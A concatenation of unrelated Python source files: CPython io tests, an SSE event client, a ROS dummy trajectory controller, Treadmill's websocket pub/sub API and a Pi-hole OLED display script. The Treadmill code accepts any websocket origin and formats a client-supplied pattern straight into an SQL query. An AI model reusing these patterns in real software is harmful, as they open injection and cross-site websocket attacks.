# - subsequent write()s are successful (either partial or complete)
self.assertEqual(N, wio.write(item * N))
wio.flush()
write_finished = True
t.join()
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except IOError as e:
if e.errno != errno.EBADF:
raise
def test_interrupterd_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupterd_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def test_main():
tests = (CIOTest, PyIOTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = dict((name, getattr(io, name)) for name in all_members)
py_io_ns = dict((name, getattr(pyio, name)) for name in all_members)
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
events.py
|
import json
import time
import sseclient
import threading
import queue
from . import curves, util
from builtins import str
class EventListener:
def __init__(self, session, curve_list, start_time=None, timeout=None):
self.curve_cache = {}
ids = []
if not hasattr(curve_list, '__iter__') or isinstance(curve_list, str):
curve_list = [curve_list]
for curve in curve_list:
if isinstance(curve, curves.BaseCurve):
ids.append(curve.id)
self.curve_cache[curve.id] = curve
else:
ids.append(curve)
args = [util.make_arg('id', ids)]
if start_time is not None:
args.append(util.make_arg('start_time', start_time))
self.url = '/api/events?{}'.format('&'.join(args))
self.session = session
self.timeout = timeout
self.retry = 3000 # Retry time in milliseconds
self.client = None
self.queue = queue.Queue()
self.do_shutdown = False
self.worker = threading.Thread(target=self.fetch_events)
self.worker.setDaemon(True)
self.worker.start()
def get(self):
try:
val = self.queue.get(timeout=self.timeout)
if isinstance(val, EventError):
raise val.exception
return val
except queue.Empty:
return EventTimeout()
def fetch_events(self):
while not self.do_shutdown:
try:
with self.session.data_request("GET", self.session.urlbase, self.url, stream=True) as stream:
self.client = sseclient.SSEClient(stream)
for sse_event in self.client.events():
if sse_event.event == 'curve_event':
event = CurveEvent(sse_event)
else:
event = DefaultEvent(sse_event)
if hasattr(event, 'id') and event.id in self.curve_cache:
event.curve = self.curve_cache[event.id]
self.queue.put(event)
if sse_event.retry is not None:
try:
self.retry = int(sse_event.retry)
except:
pass
if self.do_shutdown:
break
# Session was closed by server/network, wait for retry before looping.
time.sleep(self.retry / 1000.0)
except Exception as e:
self.queue.put(EventError(e))
break
def close(self, timeout=1):
self.do_shutdown = True
if self.client is not None:
self.client.close()
self.worker.join(timeout)
def __iter__(self):
return self
def __next__(self):
return self.get()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
class EventError:
def __init__(self, exception):
self.exception = exception
def __str__(self):
return "{}".format(self.exception)
class EventTimeout:
"""Returned on timeout, etc."""
pass
class DefaultEvent(object):
def __init__(self, sse_event):
self._raw_event = sse_event
try:
self.json_data = json.loads(sse_event.data)
except:
self.json_data = None
class CurveEvent(DefaultEvent):
def __init__(self, sse_event):
super(CurveEvent, self).__init__(sse_event)
self.id = self.json_data['id']
self.curve = None
self.created = util.parsetime(self.json_data['created'])
self.operation = self.json_data['operation']
self.tag = None
self.issue_date = None
self.range = None
if 'tag' in self.json_data:
self.tag = self.json_data['tag']
if 'issue_date' in self.json_data:
self.issue_date = util.parsetime(self.json_data['issue_date'])
if 'range' in self.json_data:
self.range = util.parserange(self.json_data['range'])
|
dummy_joint_state_controller.py
|
#!/usr/bin/env python
# Copyright (c) 2014, Kei Okada
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the Rethink Robotics nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import rospy
import copy
import threading
import Queue
import actionlib
import actionlib_msgs
# Publish
from sensor_msgs.msg import JointState
# Subscribe
from control_msgs.msg import FollowJointTrajectoryAction
from control_msgs.msg import FollowJointTrajectoryResult
from trajectory_msgs.msg import JointTrajectoryPoint
"""
This fake_joint_trajectory action server enable MoveIt! to execute planned path without running gazebo or robot contorller for real robot.
"""
class JointTrajectoryActionServer():
"""
Someo the method defined in this class is copied from MotionControllerSimulator defined in https://github.com/ros-industrial/industrial_core/blob/40a72f3e1f0e63be2f4cb99348ab1d53a21c2fdf/industrial_robot_simulator/industrial_robot_simulator
Basically JointTrajectoryActionServer is actionlib implementation of MotionControllerSimulator
Constructor of motion controller simulator
"""
def __init__(self, joint_namespace, joint_names, update_rate = 100, buffer_size = 0):
# Class lock
self.lock = threading.Lock()
# start action server
self._as = actionlib.ActionServer(joint_namespace+'/follow_joint_trajectory', FollowJointTrajectoryAction, self.trajectory_callback, auto_start = False)
self._as.start()
num_joints = len(joint_names)
self.joint_names = joint_names
# Motion loop update rate (higher update rates result in smoother simulated motion)
self.update_rate = update_rate
rospy.logdebug("Setting motion update rate (hz): %f", self.update_rate)
# Initialize joint position
self.joint_positions = [0]*num_joints
rospy.logdebug("Setting initial joint state: %s", str(self.joint_positions))
# Initialize motion buffer (contains joint position lists)
self.motion_buffer = Queue.Queue(buffer_size)
rospy.logdebug("Setting motion buffer size: %i", buffer_size)
# Shutdown signal
self.sig_shutdown = False
# Stop signal
self.sig_stop = False
# Motion thread
self.motion_thread = threading.Thread(target=self._motion_worker)
self.motion_thread.daemon = True
self.motion_thread.start()
"""
Trajectory subscription callback (gets called whenever a joint trajectory
is received).
@param msg_in: joint trajectory message
@type msg_in: JointTrajectory
"""
def trajectory_callback(self, goal):
self._current_goal = goal
msg_in = goal.get_goal()
try:
rospy.logdebug('Received trajectory with %s points, executing callback', str(len(msg_in.trajectory.points)))
if self.is_in_motion():
if len(msg_in.trajectory.points) > 0:
rospy.logerr('Received trajectory while still in motion, trajectory splicing not supported')
else:
rospy.logdebug('Received empty trajectory while still in motion, stopping current trajectory')
self.stop()
self._current_goal.set_canceled(None, "This trajectory was canceled because another once was received")
else:
goal.set_accepted("This trajectory has been accepted");
self._current_goal = goal
for point in msg_in.trajectory.points:
point = self._to_controller_order(msg_in.trajectory.joint_names, point)
self.add_motion_waypoint(point)
except Exception as e:
rospy.logerr('Unexpected exception: %s', e)
rospy.logdebug('Exiting trajectory callback')
"""
Remaps point to controller joint order
@param keys: keys defining joint value order
@type keys: list
@param point: joint trajectory point
@type point: JointTrajectoryPoint
@return point: reorder point
@type point: JointTrajectoryPoint
"""
def _to_controller_order(self, keys, point):
#rospy.loginfo('to controller order, keys: %s, point: %s', str(keys), str(point))
pt_rtn = copy.deepcopy(point)
pt_rtn.positions = self._remap_order(self.joint_names, keys, point.positions)
return pt_rtn
"""
"""
def _remap_order(self, ordered_keys, value_keys, values, ordered_values = []):
#rospy.loginfo('remap order, ordered_keys: %s, value_keys: %s, values: %s', str(ordered_keys), str(value_keys), str(values))
if len(ordered_values) != len(ordered_keys) :
ordered_values = [0]*len(ordered_keys)
mapping = dict(zip(value_keys, values))
#rospy.loginfo('maping: %s', str(mapping))
for i in range(len(ordered_keys)):
if mapping.has_key(ordered_keys[i]):
ordered_values[i] = mapping[ordered_keys[i]]
pass
return ordered_values
"""
"""
def add_motion_waypoint(self, point):
self.motion_buffer.put(point)
"""
"""
def get_joint_positions(self, full_joint_names, full_positions = []):
with self.lock:
return self._remap_order(full_joint_names, self.joint_names, self.joint_positions[:], full_positions)
"""
"""
def is_in_motion(self):
return not self.motion_buffer.empty()
"""
"""
def shutdown(self):
self.sig_shutdown = True
rospy.logdebug('Motion_Controller shutdown signaled')
"""
"""
def stop(self):
rospy.logdebug('Motion_Controller stop signaled')
with self.lock:
self._clear_buffer()
self.sig_stop = True
"""
"""
def interpolate(self, last_pt, current_pt, alpha):
intermediate_pt = JointTrajectoryPoint()
for last_joint, current_joint in zip(last_pt.positions, current_pt.positions):
intermediate_pt.positions.append(last_joint + alpha*(current_joint-last_joint))
intermediate_pt.time_from_start = last_pt.time_from_start + rospy.Duration(alpha*(current_pt.time_from_start.to_sec() - last_pt.time_from_start.to_sec()))
return intermediate_pt
"""
"""
def _clear_buffer(self):
with self.motion_buffer.mutex:
self.motion_buffer.queue.clear()
"""
"""
def _move_to(self, point, dur):
rospy.sleep(dur)
with self.lock:
if not self.sig_stop:
self.joint_positions = point.positions[:]
#rospy.loginfo('Moved to position: %s in %s', str(self.joint_positions), str(dur))
else:
rospy.logdebug('Stopping motion immediately, clearing stop signal')
self.sig_stop = False
"""
"""
def _motion_worker(self):
rospy.logdebug('Starting motion worker in motion controller simulator')
move_duration = rospy.Duration()
if self.update_rate <> 0.:
update_duration = rospy.Duration(1./self.update_rate)
last_goal_point = JointTrajectoryPoint()
with self.lock:
last_goal_point.positions = self.joint_positions[:]
while not self.sig_shutdown:
try:
current_goal_point = self.motion_buffer.get()
# If the current time from start is less than the last, then it's a new trajectory
if current_goal_point.time_from_start < last_goal_point.time_from_start:
move_duration = current_goal_point.time_from_start
# Else it's an existing trajectory and subtract the two
else:
# If current move duration is greater than update_duration, move arm to interpolated joint position
# Provide an exception to this rule: if update rate is <=0, do not add interpolated points
move_duration = current_goal_point.time_from_start - last_goal_point.time_from_start
if self.update_rate > 0:
while update_duration < move_duration:
intermediate_goal_point = self.interpolate(last_goal_point, current_goal_point, update_duration.to_sec()/move_duration.to_sec())
self._move_to(intermediate_goal_point, update_duration.to_sec()) #TODO should this use min(update_duration, 0.5*move_duration) to smooth timing?
last_goal_point = copy.deepcopy(intermediate_goal_point)
move_duration = current_goal_point.time_from_start - intermediate_goal_point.time_from_start
if not self.is_in_motion() and self._current_goal.get_goal_status().status == actionlib_msgs.msg.GoalStatus.ACTIVE:
self._current_goal.set_succeeded(FollowJointTrajectoryResult(error_code = 0)) # ok
self._move_to(current_goal_point, move_duration)
last_goal_point = copy.deepcopy(current_goal_point)
except Exception as e:
rospy.logerr('Unexpected exception: %s', e)
rospy.logdebug("Shutting down motion controller")
"""
JointTrajectoryControllerNode
This class simulates an joint trajectoin action.
"""
class JointTrajectoryControllerNode():
"""
Constructor of joint trajectory action
"""
def __init__(self):
rospy.init_node('dummy_joint_trajectory_controller')
# Class lock
self.lock = threading.Lock()
# Publish rate (hz)
self.pub_rate = rospy.get_param('pub_rate', 10.0)
rospy.logdebug("Setting publish rate (hz) based on parameter: %f", self.pub_rate)
# Joint names
self.joint_names = []
controller_list = rospy.get_param('/move_group/controller_list')
for controller in controller_list:
print controller['type'], controller['name'], controller['joints']
self.joint_names.extend(controller['joints'])
if len(self.joint_names) == 0:
rospy.logwarn("Joint list is empty, did you set controller_joint_name?")
rospy.loginfo("Simulating manipulator with %d joints: %s", len(self.joint_names), ", ".join(self.joint_names))
# Published to joint states
rospy.logdebug("Creating joint state publisher")
self.joint_state_pub = rospy.Publisher('joint_states', JointState, queue_size=1)
# Subscribe to a joint trajectory
rospy.logdebug("Creating joint trajectory action")
self.joint_trajectory_actions = []
for controller in controller_list:
self.joint_trajectory_actions.append(JointTrajectoryActionServer(controller['name'], controller['joints']))
# JointStates timed task (started automatically)
period = rospy.Duration(1.0/self.pub_rate)
rospy.logdebug('Setting up publish worker with period (sec): %s', str(period.to_sec()))
rospy.Timer(period, self.publish_worker)
# Clean up init
for ac in self.joint_trajectory_actions:
rospy.on_shutdown(ac.shutdown)
"""
The publish worker is executed at a fixed rate. This publishes the various
state and status information for the robot.
"""
def publish_worker(self, event):
self.joint_state_publisher()
"""
The joint state publisher publishes the current joint state and the current
feedback state (as these are closely related)
"""
def joint_state_publisher(self):
try:
joint_state_msg = JointState()
time = rospy.Time.now()
with self.lock:
#Joint states
joint_state_msg.header.stamp = time
joint_state_msg.name = self.joint_names
joint_positions = [0]*len(self.joint_names)
for ac in self.joint_trajectory_actions:
joint_positions = ac.get_joint_positions(self.joint_names, joint_positions)
joint_state_msg.position = joint_positions
self.joint_state_pub.publish(joint_state_msg)
except Exception as e:
rospy.logerr('Unexpected exception in joint state publisher: %s', e)
if __name__ == '__main__':
try:
rospy.loginfo('Starting dummy_joint_trajectory_controller')
controller = JointTrajectoryControllerNode()
rospy.spin()
except rospy.ROSInterruptException:
pass
|
__init__.py
|
"""Websocket API.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import collections
import errno
import fnmatch
import glob
import heapq
import io
import json
import logging
import os
import re
import sqlite3
import threading
import time
import uuid
import tornado.websocket
import six
from six.moves import urllib_parse
from treadmill import dirwatch
from treadmill import utils
_LOGGER = logging.getLogger(__name__)
class AggregateFuture(tornado.concurrent.Future):
"""Aggregation future to get done state if all depending future is done
"""
def __init__(self, name):
super(AggregateFuture, self).__init__()
self._not_ready = set()
self._ready_for_finish = False
self._name = name
self._total = 0
def ready_for_finish(self):
"""set ready for finish
if no pending, we directly set result
"""
self._ready_for_finish = True
if not self._not_ready:
self.set_result(self._total)
def depend(self, future):
"""add more dependency for ready
"""
self._total += 1
self._not_ready.add(id(future))
future.add_done_callback(self._done_callback)
def _done_callback(self, future):
"""future complete"""
self._not_ready.remove(id(future))
if self._ready_for_finish and (not self._not_ready):
_LOGGER.info('Future %s is to finish, %d aggregated.',
self._name, self._total)
self.set_result(self._total)
def make_handler(pubsub):
"""Make websocket handler factory."""
# pylint: disable=too-many-statements
class _WS(tornado.websocket.WebSocketHandler):
"""Base class contructor"""
def __init__(self, application, request, **kwargs):
"""Default constructor for tornado.websocket.WebSocketHandler"""
tornado.websocket.WebSocketHandler.__init__(
self, application, request, **kwargs
)
self._request_id = str(uuid.uuid4())
self._subscriptions = set()
def active(self, sub_id=None):
"""Return true if connection (and optional subscription) is active,
false otherwise.
If connection is not active, so are all of its subscriptions.
"""
if not self.ws_connection:
return False
return sub_id is None or sub_id in self._subscriptions
def open(self, *args, **kwargs):
"""Called when connection is opened.
Override if you want to do something else besides log the action.
"""
_LOGGER.info('[%s] Connection opened, remote ip: %s',
self._request_id, self.request.remote_ip)
def send_msg(self, msg):
"""Send message."""
_LOGGER.info('[%s] Sending message: %r', self._request_id, msg)
future = None
try:
future = self.write_message(msg)
except Exception: # pylint: disable=W0703
_LOGGER.exception('[%s] Error sending message: %r',
self._request_id, msg)
return future
def close_with_log(self):
"""close current handler's socket with logging id
"""
_LOGGER.info('[%s] Closing connection.', self._request_id)
self.close()
def send_error_msg(self, error_str, sub_id=None, close_conn=True):
"""Convenience method for logging and returning errors.
If sub_id is provided, it will be included in the error message and
subscription will be removed.
Note: this method will close the connection after sending back the
error, unless close_conn=False.
"""
error_msg = {'_error': error_str,
'when': time.time()}
if sub_id is not None:
error_msg['sub-id'] = sub_id
_LOGGER.info('[%s] Removing subscription %s',
self._request_id, sub_id)
try:
self._subscriptions.remove(sub_id)
except KeyError:
pass
future = self.send_msg(error_msg)
if close_conn:
if future is None:
self.close_with_log()
else:
future.add_done_callback(lambda _f: self.close_with_log())
return future
def on_close(self):
"""Called when connection is closed.
Override if you want to do something else besides log the action.
"""
_LOGGER.info('[%s] Connection closed.', self._request_id)
def check_origin(self, origin):
"""Overriding check_origin method from base class.
This method returns true all the time.
"""
parsed_origin = urllib_parse.urlparse(origin)
_LOGGER.debug('parsed_origin: %r', parsed_origin)
return True
def on_message(self, message):
"""Manage event subscriptions."""
if not pubsub:
_LOGGER.fatal('pubsub is not configured, ignore.')
self.send_error_msg('Fatal: unexpected error', close_conn=True)
_LOGGER.info('[%s] Received message: %s',
self._request_id, message)
sub_id = None
close_conn = True
try:
sub_msg = json.loads(message)
sub_id = sub_msg.get('sub-id')
close_conn = sub_id is None
if sub_msg.get('unsubscribe') is True:
_LOGGER.info('[%s] Unsubscribing %s',
self._request_id, sub_id)
try:
self._subscriptions.remove(sub_id)
except KeyError:
self.send_error_msg(
'Invalid subscription: %s' % sub_id,
close_conn=False
)
return
if sub_id and sub_id in self._subscriptions:
self.send_error_msg(
'Subscription already exists: %s' % sub_id,
close_conn=False
)
return
topic = sub_msg.get('topic')
impl = pubsub.impl.get(topic)
if not impl:
self.send_error_msg(
'Invalid topic: %s' % topic,
sub_id=sub_id, close_conn=close_conn
)
return
subscription = impl.subscribe(sub_msg)
since = sub_msg.get('since', 0)
snapshot = sub_msg.get('snapshot', False)
if sub_id and not snapshot:
_LOGGER.info('[%s] Adding subscription %s',
self._request_id, sub_id)
self._subscriptions.add(sub_id)
sub_future = AggregateFuture('subscribe')
# if snapshot mode, we close handler socket after sow is done
if snapshot and close_conn:
sub_future.add_done_callback(
lambda _f: self.close_with_log()
)
for watch, pattern in subscription:
future = pubsub.register(
watch, pattern, self, impl, since, sub_id
)
sub_future.depend(future)
sub_future.ready_for_finish()
except Exception as err: # pylint: disable=W0703
self.send_error_msg(str(err),
sub_id=sub_id, close_conn=close_conn)
def data_received(self, chunk):
"""Passthrough of abstract method data_received.
"""
def on_event(self, filename, operation, _content):
"""Default event handler."""
_LOGGER.debug('%s %s', filename, operation)
return {'time': time.time(),
'filename': filename,
'op': operation}
return _WS
class DirWatchPubSub:
"""Pubsub dirwatch events."""
def __init__(self, root, impl=None, watches=None):
self.root = os.path.realpath(root)
self.impl = impl or {}
self.watches = watches or []
self.watcher = dirwatch.DirWatcher()
self.watcher.on_created = self._on_created
self.watcher.on_deleted = self._on_deleted
self.watcher.on_modified = self._on_modified
self.watch_dirs = set()
for watch in self.watches:
watch_dirs = self._get_watch_dirs(watch)
self.watch_dirs.update(watch_dirs)
for directory in self.watch_dirs:
_LOGGER.info('Added permanent dir watcher: %s', directory)
self.watcher.add_dir(directory)
self.ws = make_handler(self)
self.handlers = collections.defaultdict(list)
def register(self, watch, pattern, ws_handler, impl, since, sub_id=None):
"""Register handler with pattern.
return `tornado.concurrent.Future`
future will be done when sow completes
"""
watch_dirs = self._get_watch_dirs(watch)
for directory in watch_dirs:
if ((not self.handlers[directory] and
directory not in self.watch_dirs)):
_LOGGER.info('Added dir watcher: %s', directory)
self.watcher.add_dir(directory)
# Store pattern as precompiled regex.
pattern_re = re.compile(
fnmatch.translate(pattern)
)
self.handlers[directory].append(
(pattern_re, ws_handler, impl, sub_id)
)
return self._sow(
watch, pattern, since, ws_handler, impl,
sub_id=sub_id
)
def _get_watch_dirs(self, watch):
pathname = os.path.realpath(os.path.join(self.root, watch.lstrip('/')))
return [path for path in glob.glob(pathname) if os.path.isdir(path)]
@utils.exit_on_unhandled
def _on_created(self, path):
"""On file created callback."""
_LOGGER.debug('created: %s', path)
self._handle('c', path)
@utils.exit_on_unhandled
def _on_modified(self, path):
"""On file modified callback."""
_LOGGER.debug('modified: %s', path)
self._handle('m', path)
@utils.exit_on_unhandled
def _on_deleted(self, path):
"""On file deleted callback."""
_LOGGER.debug('deleted: %s', path)
self._handle('d', path)
def _handle(self, operation, path):
"""Get event data and notify interested handlers of the change."""
directory, filename = os.path.split(path)
# Ignore (.) files, as they are temporary or "system".
if filename[0] == '.':
return
directory_handlers = self.handlers.get(directory, [])
handlers = [
(handler, impl, sub_id)
for pattern_re, handler, impl, sub_id in directory_handlers
if (handler.active(sub_id=sub_id) and
pattern_re.match(filename))
]
if not handlers:
return
if operation == 'd':
when = time.time()
content = None
else:
if '/trace/' in path or '/server-trace/' in path:
# Specialized handling of trace files (no need to stat/read).
# If file was already deleted (trace cleanup), don't ignore it.
_, timestamp, _ = filename.split(',', 2)
when, content = float(timestamp), ''
else:
try:
when = os.stat(path).st_mtime
with io.open(path) as f:
content = f.read()
except (IOError, OSError) as err:
if err.errno == errno.ENOENT:
# If file was already deleted, ignore.
# It will be handled as 'd'.
return
raise
self._notify(handlers, path, operation, content, when)
def _notify(self, handlers, path, operation, content, when):
"""Notify interested handlers of the change."""
root_len = len(self.root)
for handler, impl, sub_id in handlers:
try:
payload = impl.on_event(path[root_len:],
operation,
content)
if payload is not None:
payload['when'] = when
if sub_id is not None:
payload['sub-id'] = sub_id
handler.send_msg(payload)
except Exception as err: # pylint: disable=broad-except
_LOGGER.exception('Error handling event: %s, %s, %s, %s, %s',
path, operation, content, when, sub_id)
handler.send_error_msg(
'{cls}: {err}'.format(
cls=type(err).__name__,
err=str(err)
),
sub_id=sub_id,
close_conn=sub_id is None
)
def _db_records(self, db_path, sow_table, watch, pattern, since):
"""Get matching records from db."""
# if file does not exist, do not try to open it. Opening connection
# will create the file, there is no way to prevent this from
# happening until py3.
#
if not os.path.exists(db_path):
_LOGGER.info('Ignore deleted db: %s', db_path)
return (None, None)
# There is rare condition that the db file is deleted HERE. In this
# case connection will be open, but the tables will not be there.
conn = sqlite3.connect(db_path)
# Before Python 3.7 GLOB pattern must not be parametrized to use index.
select_stmt = """
SELECT timestamp, path, data FROM %s
WHERE directory GLOB ? AND name GLOB '%s' AND timestamp >= ?
ORDER BY timestamp
""" % (sow_table, pattern)
# Return open connection, as conn.execute is cursor iterator, not
# materialized list.
try:
return conn, conn.execute(select_stmt, (watch, since,))
except sqlite3.OperationalError as db_err:
# Not sure if the file needs to be deleted at this point. As
# sow_table is a parameter, passing non-existing table can cause
# legit file to be deleted.
_LOGGER.info('Unable to execute: select from %s:%s ..., %s',
db_path, sow_table, str(db_err))
conn.close()
return (None, None)
# pylint: disable=too-many-branches
def _sow(self, watch, pattern, since, handler, impl, sub_id=None):
"""Publish state of the world."""
if since is None:
since = 0
def _publish(item):
when, path, content = item
future = None
try:
payload = impl.on_event(str(path), None, content)
if payload is not None:
payload['when'] = when
if sub_id is not None:
payload['sub-id'] = sub_id
future = handler.send_msg(payload)
except Exception as err: # pylint: disable=W0703
_LOGGER.exception('Error handling sow event: %s, %s, %s, %s',
path, content, when, sub_id)
future = handler.send_error_msg(str(err), sub_id=sub_id)
return future
sow_future = AggregateFuture('sow[{}]'.format(pattern))
db_connections = []
fs_records = self._get_fs_sow(watch, pattern, since)
sow = getattr(impl, 'sow', None)
sow_table = getattr(impl, 'sow_table', 'sow')
try:
records = []
if sow:
dbs = sorted(glob.glob(os.path.join(self.root, sow, '*')))
for db in dbs:
if os.path.basename(db).startswith('.'):
continue
conn, db_cursor = self._db_records(
db, sow_table, watch, pattern, since
)
if db_cursor:
records.append(db_cursor)
# FIXME: Figure out pylint use before assign
#
# pylint: disable=E0601
if conn:
db_connections.append(conn)
records.append(fs_records)
# Merge db and fs records, removing duplicates.
prev_path = None
for item in heapq.merge(*records):
_when, path, _content = item
if path == prev_path:
continue
prev_path = path
future = _publish(item)
if future is not None:
sow_future.depend(future)
# sow future will be done after all send_msg() are done
sow_future.ready_for_finish()
finally:
for conn in db_connections:
if conn:
conn.close()
return sow_future
def _get_fs_sow(self, watch, pattern, since):
"""Get state of the world from filesystem."""
root_len = len(self.root)
fs_glob = os.path.join(self.root, watch.lstrip('/'), pattern)
files = glob.glob(fs_glob)
items = []
for filename in files:
try:
stat = os.stat(filename)
with io.open(filename) as f:
content = f.read()
if stat.st_mtime >= since:
path, when = filename[root_len:], stat.st_mtime
items.append((when, path, content))
except (IOError, OSError) as err:
# Ignore deleted files.
if err.errno != errno.ENOENT:
raise
return sorted(items)
def _gc(self):
"""Remove disconnected websocket handlers."""
for directory in list(six.viewkeys(self.handlers)):
handlers = [
(pattern, handler, impl, sub_id)
for pattern, handler, impl, sub_id in self.handlers[directory]
if handler.active(sub_id=sub_id)
]
_LOGGER.debug('Number of active handlers for %s: %s',
directory, len(handlers))
if not handlers:
_LOGGER.debug('No active handlers for %s', directory)
self.handlers.pop(directory, None)
if directory not in self.watch_dirs:
# Watch is not permanent, remove dir from watcher.
self.watcher.remove_dir(directory)
else:
self.handlers[directory] = handlers
@utils.exit_on_unhandled
def run(self, once=False):
"""Run event loop."""
last_gc = time.time()
while True:
wait_interval = 10
if once:
wait_interval = 0
if self.watcher.wait_for_events(wait_interval):
self.watcher.process_events()
if (time.time() - last_gc) >= wait_interval:
self._gc()
last_gc = time.time()
if once:
break
@utils.exit_on_unhandled
def run_detached(self):
"""Run event loop in separate thread."""
event_thread = threading.Thread(target=self.run)
event_thread.daemon = True
event_thread.start()
|
dualkarsten.py
|
#!/usr/bin/python3
import os, sys
import platform
import humanize
import psutil
import requests
import time
#import threading
#from threading import Thread
from multiprocessing import Process
#imports for Fritz.Box
from fritzconnection.lib.fritzstatus import FritzStatus
from fritzconnection.lib.fritzhosts import FritzHosts
from fritzconnection.lib.fritzwlan import FritzWLAN
from fritzconnection.lib.fritzcall import FritzCall
#imports for Display
from luma.core.interface.serial import i2c
from luma.core.sprite_system import framerate_regulator
from luma.oled.device import ssd1306
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
from PIL import ImageSequence
from datetime import datetime
interface = os.getenv('PIHOLE_OLED_INTERFACE', 'eth0') #Network interface to retrieve the IP address
mount_point = os.getenv('PIHOLE_OLED_MOUNT_POINT', '/') #Mount point for disk usage info
#initialisation for Fritz.Box API / IP and Password needs to be customized:
fs = FritzStatus(address='192.168.178.1', password='password')
fh = FritzHosts(address='192.168.178.1', password='password')
fw = FritzWLAN(address='192.168.178.1', password='password')
fc = FritzCall(address='192.168.178.1', password='password')
serial = i2c(port=1, address=0x3C)
disp = ssd1306(serial)
serial2 = i2c(port=0, address=0x3C)
disp2 = ssd1306(serial2)
width = disp.width
height = disp.height
UPTag = ''
def CheckIfUp():
SystemIP = '192.168.178.27'
UPTag = os.system("ping -c 1 " + SystemIP)
f = open("UPTag.txt", "w")
f.write(str(UPTag))
f.close()
def load_font(filename, font_size):
font_path = '/home/pi/PiHole-UI/fonts/'
try:
font = ImageFont.truetype(font_path + filename, font_size)
except IOError:
print('font file not found -> using default font')
font = ImageFont.load_default()
return font
image = Image.new('1', (width, height))
draw = ImageDraw.Draw(image)
def show_logoleft(filename, device):
logoImage = Image.new('1', (device.width, device.height))
img_path = '/home/pi/PiHole-UI/res/'
try:
logoImage = Image.open(img_path + filename).convert('1')
except IOError:
print("Cannot open file %s" % filename)
pass
disp.display(logoImage)
def show_logoright(filename, device):
logoImage = Image.new('1', (device.width, device.height))
img_path = '/home/pi/PiHole-UI/res/'
try:
logoImage = Image.open(img_path + filename).convert('1')
except IOError:
print("Cannot open file %s" % filename)
pass
disp2.display(logoImage)
font1 = load_font('PixelOperator.ttf', 12)
font2 = load_font('PixelOperator.ttf', 10)
font3 = load_font('PixelOperator.ttf', 10)
font4 = load_font('PixelOperator.ttf', 10)
font = load_font('PixelOperator.ttf', 10)
clockbold = load_font('DSG.ttf', 30)
datebold = load_font('DSG.ttf', 30)
dispcounter = 1
FirstStart = 1
hostname = platform.node()
loopcount = 0
disp.clear()
disp2.clear()
def ClockDisplayL():
draw.rectangle((0, 0, 128, 64), outline=0, fill=0)
draw.text((4, 22), time.strftime("%H:%M:%S"), font=clockbold, fill=1)
disp.display(image)
time.sleep(-time.time() % 60)
def ClockDisplayR():
draw.rectangle((0, 0, 128, 64), outline=0, fill=0)
draw.text((4, 22), time.strftime("%d-%m-%Y"), font=datebold, fill=1)
disp2.display(image)
time.sleep(-time.time() % 60)
def LS1():
#1st Screen CPU/RAM/Uptime..
addr = psutil.net_if_addrs()[interface][0]
draw.text((0, 0), "Pi-hole %s" % addr.address.rjust(15), font=font, fill=255)
uptime = datetime.now() - datetime.fromtimestamp(psutil.boot_time())
draw.text((0, 12), "Up: %s" % humanize.naturaltime(uptime), font=font, fill=255)
draw.text((0, 22), " %.1f %.1f %.1f" % os.getloadavg(), font=font, fill=255)
